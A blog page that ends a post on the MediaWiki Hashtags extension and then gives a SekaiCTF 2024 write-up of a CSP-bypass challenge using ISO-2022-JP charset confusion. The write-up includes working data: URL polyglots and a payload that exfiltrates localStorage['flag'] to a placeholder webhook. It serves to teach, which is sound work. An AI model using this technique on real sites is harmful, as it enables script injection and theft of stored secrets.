  • If an edit summary is revision deleted or oversighted, remove the tags
  • Make sure hashtag related change tags are marked as "active" and "hidden".
  • When viewing a list of edits (history, Special:RecentChanges, etc), ensure that hashtags are linked and that clicking on them shows only edits tagged with that tag

 The first three parts work like a traditional extension, using normal hooks.

I used the RevisionFromEditCompleteHook and ManualLogEntryBeforePublishHook to run a callback anytime an edit or log entry is saved. Originally I used RecentChange_saveHook, however that didn't cover some cases where an edit was created but not published to RecentChanges, such as during page moves. ManualLogEntryBeforePublishHook covers more cases than it might appear at first glance, because it will also tag the revision associated with the log entry. All this is pretty straightforward, and allowed tagging most cases. Restricted (confidential) logs still do not get tagged. It seems difficult to do so with the hooks MediaWiki provides, but perhaps its best not to tag such log entries, lest information is leaked.

Similarly, I used the ArticleRevisionVisibilitySetHook to delete/undelete tags after revdel. Unfortunately MediaWiki does not provide a similar hook for log entries. I proposed adding one, but that is still pending code review.

Marking tags as active was also quite straightforward using normal hooks.

All that leaves is ensuring hashtags are linked. For this I leveraged MediaWiki's newish dependency injection system.

Services and dependency injection

For the last few years, MediaWiki has been in the progress of being re-architectured, with the goal to make it more modular, easier to test, and easier to understand. A core part of that effort has been to move to a dependency injection system.

If you are familiar with MediaWiki's dependency injection system, you might want to skip past this part.

Traditionally in MediaWiki, if some code needed to call some other code from a different class, it might look like this:

class MyClass { 
    function foo($bar) {
        $someObject = Whatever::singleton();
        $result = $someObject->doSomething( $bar );
        return $result;
    }
}

In this code, when functionality of a different class is needed, you either get it via global state, call some static method or create a new instance. This often results in classes that are coupled together.

In the new system we are supposed to use, the code would look like this:

class MyClass {
    private SomeObject $someObject;
    public function __construct( SomeObject $someObject ) {
         $this->someObject = $someObject;
    }
    public function foo( $bar ) {
         return $this->someObject->doSomething( $bar );
    }
}

The idea being, classes are not supposed to directly reference one another. They can reference the interfaces of objects that are passed to it (typically in the constructor), but they are not concretely referencing anything else in the system. Your class is always given the things it needs; it never gets them for itself. In the old system, the code was always referencing the Whatever class. In the new system, the code references whatever object was passed to the constructor. In a test you can easily replace that with a different object, if you wanted to test what happens when the Whatever class returns something unexpected. Similarly, if you want to reuse the code, but in a slightly different context, you can just change the constructor args for it to reference a different class as long as it implements the required interface.

This can make unit testing a lot easier, as you can isolate just the code you want to test, without worrying about the whole system. It can also make it quite easy to extend code. Imagine you have some front-end class that references a back-end class that deals with storing things in the database. If you suddenly need to use multiple storage backends, you can just substitute the implementation of the backend class, without having to implement anything special.

MediaWikiServices

All this is great, but at some point you actually need to do stuff and create some classes that have concrete implementations.

The way this works in "new" MediaWiki, is the MediaWikiServices class. This is responsible for keeping track of "services" which are essentially the top level classes.

Services are classes that:

  • Have a lifetime of the entire request.
  • Normally only have one instance existing at a time.
  • Do not depend on global state (Config is not considered state, but anything about the request, like what page is being currently viewed is state. Generally these services should not depend on RequestContext)

You can register services, in a service wiring file. This also allows you to register what services your service needs as constructor arguments.

Some classes do not fit these requirement. For example, a class that represents some data we would expect to have multiple instances with shorter lifetimes, to represent the data in question. Generally the approach for such classes is to create a Factory class that is a service, which makes individual instances and passing along dependencies as appropriate.

But still the question remains, how do you get these services initially. There is an escape hatch, where you can call MediaWikiServices::getInstance()->getService( $foo ), however that is strongly discouraged. This essentially uses global state, which defeats the point of dependency injection, where the goal is that your class is passed everything it needs, but never reaches out and gets anything itself.

The preferred solution is that the top level entrypoint classes in your extension are specified in your extension's extension.json file.

Typically extensions work on the levels of hooks. This is where you register a class, which has some methods that are called when certain events in MediaWiki happen. You register these hook handlers in your extension's manifest (extension.json) file.

In old mediawiki, you would just register the name of some static methods. In new MediaWiki, you register a class (HookHandlers), along with details of what services its constructor needs. MediaWiki then initiates this class for you with appropriate instances of all it dependencies, thus handling all the bootstrapping for you.

To summarize, you tell MediaWiki you need certain services for your hook class. When the hook class is instantiated, it is constructed with the default version of the services you need (Possibly including services you defined yourselves). Those services are in turn instantiated with whatever services they need, and so on.

All this means you can write classes that never reach out to other classes, but instead are always provided with the other classes they need.

What does this have to do with Hashtags?

All this is not generally meant as an extension mechanism. The goal is to make it so classes are isolated from each other for easier testing, modification and understanding.

However, the services bootstrap process does have an idea of default services, which it provides when creating objects that have dependencies. The entire point is to be able to easily replace services with different services that implement the same interface. Sure it is primarily meant as a means of better abstraction and testability, but why not use it for extensibility? In this extension, I used this mechanism to allow extending some core functionality with my own implementation.

One of those services is called CommentParserFactory. This is responsible for parsing edit summaries (Technically, it is responsible for creating the CommentParser objects that do so). This is exactly what we need if we want to change how links are displayed in edit summaries.

In the old system of MediaWiki, we would have no hope in making this extension. In the old days, to format an edit summary, you called Linker::formatComment(). This was a static method of Linker. There would be no hope of modifying it, unless someone explicitly made a hook just for that purpose.

Here we can simply tell MediaWiki to replace the default instance of CommentParserFactory with our own. We do this by implementing the MediaWikiServicesHook. This allows us to dynamically change the default instantiation of services.

There are two ways of doing this. You can either call $services->redefineService() which allows you to create a new version of the Service from scratch. The alternative is to call $services->addServiceManipulator(). This passes you the existing version of the service, which you can change, call methods on, or return an entirely different object.

Hashtags uses the latter method. I essentially implemented it by wrapping the existing CommentParser. I wanted to just replace hashtags with links, but continue to use MediaWiki core for all the other parsing.

Using Services as an extension mechanism

How did this go?

On the bright side, i was able to make this extension, which i otherwise would not have been able to. It indeed works.

Additionally, I feel like simply replacing a class and implementing its interface, is a much cleaner abstraction layer for extensibility than simply executing a callback at random points in the code that can do anything.

There are some frustrations though with using this approach.

First of all, everything is type hinted with the concrete class. This meant i had to extend the concrete class in order for all the type hints to work even though I didn't really need or want to inherit any methods. Perhaps it would be nice to have some trait that automatically adds all the forwarding magic with __get().

I also intentionally did not call the parent constructor, which i guess is fine because i never call any of the parent's methods, however it does feel a bit odd. The way i implemented my class was to take in the constructor an instance of the "base" class that i forward calls to after wrapping them in my own stuff. Part of the reason for this is I wanted to use the old CommentParser object, because constructor functions in MediaWiki are highly unstable between versions, so I didn't want to have to manually construct anything from MW core.

The part where this really falls down is if you want to have multiple extensions layering things. This really only works if they both do so in the same way.

At one point in my extension, I wanted to access the list of tags parsed. In retrospect, perhaps this would have been better implemented as having a separate service alias that is explicitly for my class.  Instead, i implemented it by adding an additional method to return this data and just relied on the normal service name. But i ran into the problem of i can't be sure nobody else redefined this service, so how do i know that the service i got is the one i created with this method? I just tested using instaceof, and if not tried to wrap the returned service again in my class. This has the benefit of if anyone else modifies the CommentParser service in a layered way, I will hopefully run their code and the list of tags will match the result. On the other hand its icky, so maybe the better method was the aforementioned having a separate service alias explicitly for my class. However again, that has the problem of how to bootstrap, since I didn't want to ever have to instantiate the base CommentParser class, with MediaWiki's highly unstable constructors.

This whole part seemed icky, and the various options seemed bad. In practice it maybe doesn't matter as its unlikely two extensions will wrap this service, but it seems like there should be a better way. I guess wrapping the service is fine, its extracting additional information that's the problem.

I think documenting best practices on how to "decorate" services would go a long way here to making this better. Right now it is very unclear how to do this in a way that is composable and extensible.

I've also seen examples of people using reflection when trying to "extend" services, but luckily i didn't need to resort to that.

Testability

The last thing I wanted to mention, is i do think this general system has had dividends. The path to get here was a little rocky, but I do think this style of code is much clearer.

I used to absolutely hate writing tests for mediawiki code. It was such a frustrating developer experience. Now it is much less painful. For this extension I have 100% test coverage (excluding maintenance scripts).  Admittedly it is a relatively small extension, but five years ago, I couldn't imagine bothering to do that for any MediaWiki code.

Conclusion

I had fun writing this extension and am proud of the result. It was interesting to experiment with using MediaWikiServices as an extension mechanism

Consider trying it out on your wiki, and let me know what you think! The extension should be compatible with MediaWiki 1.39 and higher (Using appropriate REL branch)

More information about it can be found at https://www.mediawiki.org/wiki/Extension:Hashtags



Tuesday, September 3, 2024

SekaiCTF 2024 - htmlsandbox

 Last weekend I competed in SekaiCTF. I spent most of the competition focusing on one problem - htmlsandbox. This was quite a challenge. It was the least solved web problem with only 4 solves. However I'm quite happy to say that I got it in the end, just a few hours before the competition ended.

The problem 

We are given a website that lets you post near arbitrary HTML. The only restriction is that the following JS functions must evaluate to true:

  • document.querySelector('head').firstElementChild.outerHTML === `<meta http-equiv="Content-Security-Policy" content="default-src 'none'">`
  • document.querySelector('script, noscript, frame, iframe, object, embed') === null
  • And there was a check for a bunch of "on" event attributes. Notably they forgot to include onfocusin in the check, but you don't actually need it for the challenge
     

 This is all evaluated at save time by converting the html to a data: url, passing it to pupeteer chromium with javascript and external requests disabled. If it passes this validation, the html document goes on the web server.

There is also a report bot that you can tell to visit a page of your choosing. Unlike the validation bot, this is a normal chrome instance with javascript enabled. It will also browse over the network instead of from a data: url, which may seem inconsequential but will have implications later. This bot has a "flag" item in its LocalStorage. The goal of the task is to extract this flag value.

The first (CSP) check is really the bulk of the challenge. The other javascript checks can easily be bypassed by either using the forgotten onfocusin event handler or by using <template shadowrootmode="closed"><script>....</script></template> which hides the script tag from document.querySelector().

CSP meta tag

Placing <meta http-equiv="Content-Security-Policy" content="default-src 'none'"> in the <head> of a document disables all scripts in the page (as script-src inherits from default-src)

Normally CSP is specified in an HTTP header. Putting it inside the html document does come with some caveats:

  • It must be in the <head>. If its in the <body> it is ignored.
  • It does not apply to <script> tags (or anything else) in the document present prior to the <meta> tag

So my first initial thought was that maybe we could somehow get a <script> tag in before the meta tag. The challenge checks that the meta tag is the first element of <head>, but maybe we could put the <script> before the <head> element.

 Turns out, the answer is no. Per the HTML5 spec. If you add some content before the head, it acts like you implicitly closed the <head> tag and started the body tag. No matter how you structure your document, the web browser fixes it up to be reasonable. You cannot put anything other then a comment (and DTDs/PIs) before the <head>.

I also thought about DOM cloberring, but it seemed pretty impossible given that document.querySelector() and === was used.

The other wrong turn I tried was redirecting the document. You can put a <meta http-equiv="refresh" content="0;url=http://example.com"> tag in a document to redirect the page somewhere else. My thought was that if i redirect the page really quickly, maybe the checks would happen on a page I control.

The problem here is that network requests were disabled in puppeteer so I can't just redirect to some site I control. Chrome also disables meta redirection to data: urls (I guess they were a common phishing vector or something) so they are out. I can't use blob: urls as I have no javascript to create a blob url.

Similarly, if instead I try to delay the redirect until after validation has finished, I still have nowhere to redirect too, as I need some page with an XSS on the same origin in order to read the localStorage. Thus client side redirection was out.

Lots of dead ends here.

The hint

Since initially no team had solved the problem for quite a while, the organizers provided a hint.

You may want to look for a parsing differential in streamed and non-streamed HTML parsing.

Alright, off to the HTML5 spec.

Its a big spec, but it seemed like section 13.2 would be the relevant part. After reading that part several times, the following seemed like the only thing the hint could possibly be referring to:

Section 13.2.3.2 Determining the character encoding:

The user agent may wait for more bytes of the resource to be available, either in this step or at any later step in this algorithm. For instance, a user agent might wait 500ms or 1024 bytes, whichever came first. In general preparsing the source to find the encoding improves performance, as it reduces the need to throw away the data structures used when parsing upon finding the encoding information. However, if the user agent delays too long to obtain data to determine the encoding, then the cost of the delay could outweigh any performance improvements from the preparse.

So during the algorithm for determining a character encoding (charset), browsers can choose to only apply it to the first part of the document if all the bytes of the document are not yet available.

More concretely, this means that for a data: url, the character encoding algorithm applies to the whole document as the document is available immediately. For a network load, it does not.

In our challenge, the validation bot loads from a data: url. The report bot loads from network. This seems like something we can exploit.

Charset confusion

I've heard of character set confusion before, but usually in the context of different systems supporting different character sets. For example, where the validator supports UTF-7 which has a non-ascii compatible encoding of <, but web browsers do not support it and interpret the document with an unknown charset as UTF-8.

However this is a bit different, since the web browser and ultimate viewer are the same program - both a web browser, both supporting the exact same charsets.

We need to find two character encodings that interpret the same document different ways - one with the CSP policy and one without, and have both character encodings be supported by modern web browsers.

What character sets can we even possibly specify? First off we can discard any encodings that always encode <, > and " the way ascii would which include all single-byte legacy encodings. Browsers have intentionally removed support for such encodings due to the problems caused by encodings like UTF-7 and HZ. Per the encoding standard, the only ones left are the following legacy multi-byte encodings: big5, EUC-JP, ISO-2022-JP, Shift_JIS, EUR-KR, UTF-16BE, UTF-16LE.

Looking through their definitions in the encoding standard, ISO-2022-JP stands out because it is stateful. In the other encodings, a specific byte might affect the interpretation of the next few bytes, but with ISO-2022-JP, a series of bytes can affect the meaning of the entire rest of the text.

ISO-2022-JP is not really a single encoding, but 3 encodings that can be switched between each other with a special code. When in ascii mode, the encoding looks like normal ascii. But when in "katakana" mode, the same bytes get interpreted as Japanese characters.

This seems ideal for the purposes of creating a polygot document, as we can switch on and off the modes to change the meaning of a wide swath of text.

An Example

Note: throughout this post i will be using ^[ to refer to the ASCII escape character (0x1B). If you want to try these out as data: urls, replace the ^[ with %1B

Consider the following HTML snippet:

<html><head><!-- ^[$BNq --><script>alert('here');</script><!-- ^[(B--></head></html>

When using a normal encoding like windows-1252 (aka ISO-8859-1) or UTF-8, the document looks just like you see above, just with the ^[ replaced with an unprintable character.

When viewed under the ISO-2022-JP encoding, it looks like:

<html><head><!-- 暦�⑬昭黹鱸頸鍾跂鶯├蒹鱚З纂�竰蜷�次⑬�--></head></html>

The ^[$BNq sequence changes the charset mode to katakana, ^[(B changes it back to ASCII. Under windows-1252 these escape sequences are ignored, of course. Thus we have made a polygot document that will give an alert box only in windows-1252 mode.

If you want to try yourself:

data:text/html;charset=windows-1252,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

vs

data:text/html;charset=iso-2022-jp,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

 Note how the body of the url is exactly the same. The only thing that is different is the charset specified in the mime type of the url, which totally changes the interpretation.

Exploiting the detection algorithm

We now have the ability to make HTML that is very different depending on charset, but how do we make sure it is interpreted with different charsets in different contexts?

If we recall from the problem description - the validator loads the page via a data: url, which loads the full page instantly. The victim loads the page over the network.

In the network case, chrome will start parsing immediately and guess the charset before the entire document.

So in theory all we need to do is make the document really long, have the part at the beginning be evil under one charset, add a charset declaration at the end for the other charset which makes the document look good. Browsers loading it all at once will see it as benign, browsers loading it over the network will see it as evil. This might look something like:

<html>
	<head>
    	<!-- é - Add a windows-1252 character to make sure early heurstics detect as windows-1252 -->
        <!-- ^[$BNq From this part onwards it is visible only in windows-1252 mode -->
        <script> doSomeEvilStuff();x = new Image(); x.src='https://mywebhook?' + encodeURIComponent(localStorage['flag']); </script>
        <!-- Bunch of junk. Repeat this 3000 times to split amongst multiple packets -->
        <!-- ^[(B After this point, visible in both modes -->
        <meta http-equiv="Content-Security-Policy" content="default-src 'none'">
        <meta charset="iso-2022-jp">
    </head>
<body></body></html>

This should be processed the following way:

  • As a data: url - The browser sees the <meta charset="iso-2022-jp"> tag, processes the whole document in that charset. That means that the <script> tag is interpreted as an html comment in japanese, so is ignored
  • Over the network - The browser gets the first few packets. The <meta charset=..> tag has not arrived yet, so it uses a heuristic to try and determine the character encoding. It sees the é in windows-1252 encoding (We can use the same logic for UTF-8, but it seems the challenge transcodes things to windows-1252 as an artifact of naively using atob() function), and makes a guess that the encoding of the document is windows-1252. Later on it sees the <meta> tag, but it is too late at this point as part of the document is already parsed (note: It appears that chrome deviates from the HTML5 spec here. The HTML5 spec says if a late <meta> tag is encountered, the document should be thrown out and reparsed provided that is possible without re-requesting from the network. Chrome seems to just switch charset at the point of getting the meta tag and continue on parsing). The end result is the first part of the document is interpreted as windows-1252, allowing the <script> tag to be executed.

So I tried this locally.

It did not work.

It took me quite a while to figure out why. Turns out chrome will wait a certain amount of time before preceding with parsing a partial response. The HTML5 spec suggests this should be at least 1024 bytes or 500ms (Whichever is longer), but it is unclear what chrome actually does. Testing this on localhost of course makes the network much more efficient. The MTU of the loopback interface is 64kb, so each packet is much bigger. Everything also happens much faster, so the timeout is much less likely to be reached.

Thus i did another test, where i used a php script, but put <?php flush();sleep(1); ?> in the middle, to force a delay. This worked much better in my testing. Equivalently I probably could have just tested on the remote version of the challenge.

After several hours of trying to debug, I had thus realized I had solved the problem several hours ago :(. In any case the previous snippet worked when run on the remote.

Conclusion

 This was a really fun challenge. It had me reading the HTML5 spec with a fine tooth comb, as well as making many experiments to verify behaviour - the mark of an amazing web chall.

I do find it fascinating that the HTML5 spec says:

Warning: The decoder algorithms describe how to handle invalid input; for security reasons, it is imperative that those rules be followed precisely. Differences in how invalid byte sequences are handled can result in, amongst other problems, script injection vulnerabilities ("XSS").

 

 And yet, Chrome had significant deviations from the spec. For example, <meta> tags (after pre-scan) are supposed to be ignored in <noscript> tags when scripting is enabled, and yet they weren't. <meta> tags are supposed to be taken into account inside <script> tags during pre-scan, and yet they weren't. According to the spec, if a late <meta> tag is encountered, browsers are supposed to either reparse the entire document or ignore it, but according to other contestants chrome does neither and instead switches midstream.

Thanks to project Sekai for hosting a great CTF.